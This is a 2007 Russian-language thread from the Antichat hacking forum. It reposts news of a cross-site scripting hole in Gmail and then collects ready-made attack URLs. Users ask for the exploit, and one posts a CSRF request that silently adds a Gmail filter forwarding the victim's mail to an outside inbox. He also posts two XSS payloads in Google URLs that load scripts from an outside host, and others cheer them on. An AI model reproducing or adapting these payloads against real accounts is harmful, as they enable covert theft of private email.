Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   Новая уязвимость в сервисах Google: кража писем из Gmail (https://forum.antichat.xyz/showthread.php?t=49984)

GiZZZ 27.09.2007 16:24
Новая уязвимость в сервисах Google: кража писем из Gmail
 
27.09.07, Чт, 14:04, Мск
_http://internet.cnews.ru/news/line/index.shtml?2007/09/27/267960

В дополнение к трем уязвимостям(я выкладывал новость вчера, но ее удалили...) в продуктах и сервисах Google – Groups, поисковой машине и Picasa, обнаруженным на этой неделе, в среду, 26 сентября, в системе сервисов портала найдена еще одна. Уязвимость позволяет похитить письма из ящика Gmail.

Уязвимость обнаружил исследователь GNU Citizen Петко Петков (Petko D. Petkov), сообщает The Register. Она, как и три вышеупомянутые, относится к классу межсайтового скриптинга (CSS/XSS). При переходе по URL, содержащему JavaScript-код в значении одного из параметров вызова веб-страницы, этот код выполняется на самой странице от имени сайта, к которому обратился пользователь. Подобные уязвимости вызваны отсутствием проверки содержимого параметров перед тем, как вывести его на веб-страницу. Надежно написанные веб-приложения отсеивают HTML-тэги, включая JavaScript.

Обычно при помощи CSS/XSS крадут куки с данными об авторизации или подгружают файлы, которые пользователь запустит, доверяя уязвимому сайту. В случае с Gmail злоумышленник может при помощи кода добавить в учетную запись фильтр, копирующий письма по указанному адресу. Для того чтобы уязвимость можно было использовать, в браузере жертвы должен быть открыт почтовый ящик Gmail.

Nightmarе 27.09.2007 17:34
Ccылку на XSS мне в ЛС отошли плз.

DCSTAJIKER 27.09.2007 20:54
и мне плз потому что сдеть сотрут если еще напишешь(

GiZZZ 27.09.2007 21:45
это лишь новость, опубликованная в СМИ
все подробности и ссылки лишь у
Цитата:
Уязвимость обнаружил исследователь GNU Citizen Петко Петков (Petko D. Petkov), сообщает The Register.
;)

SanyaX 27.09.2007 21:51
Угу так и он что то кому то скажет :).

GiZZZ 27.09.2007 22:30
Цитата:
Сообщение от SanyaX
Угу так и он что то кому то скажет :).
угу...именно это и имел ввиду)

Nightmarе 27.09.2007 23:18
номер его дайте - скажет.

+toxa+ 29.09.2007 02:33
Код:
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
вот и сам хэк код кстати говоря)

и ещё парочка, которые выложили раньше, но из-за непопулярности блога никто ничё незаметил)
Код:
http://mail.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=url.blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3E%3Cscript+src%3Dhttp://beford.org/stuff/prototype.js%3E%3C/script%3E%3Cscript+src%3Dhttp://beford.org/stuff/x2.js%3E%3C/script%3E%3Cnoscript%3E/
Код:
http://groups.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3E%3Cscript+src%3Dhttp://beford.org/stuff/x.js%3E%3C/script%3E%3Cnoscript%3E/

zooomer 29.09.2007 14:05
Хааа....Тоха респект....Новость интересная +) Репа..

slider 30.09.2007 09:23
гг.. засекаем время когда закроют )


Время: 22:52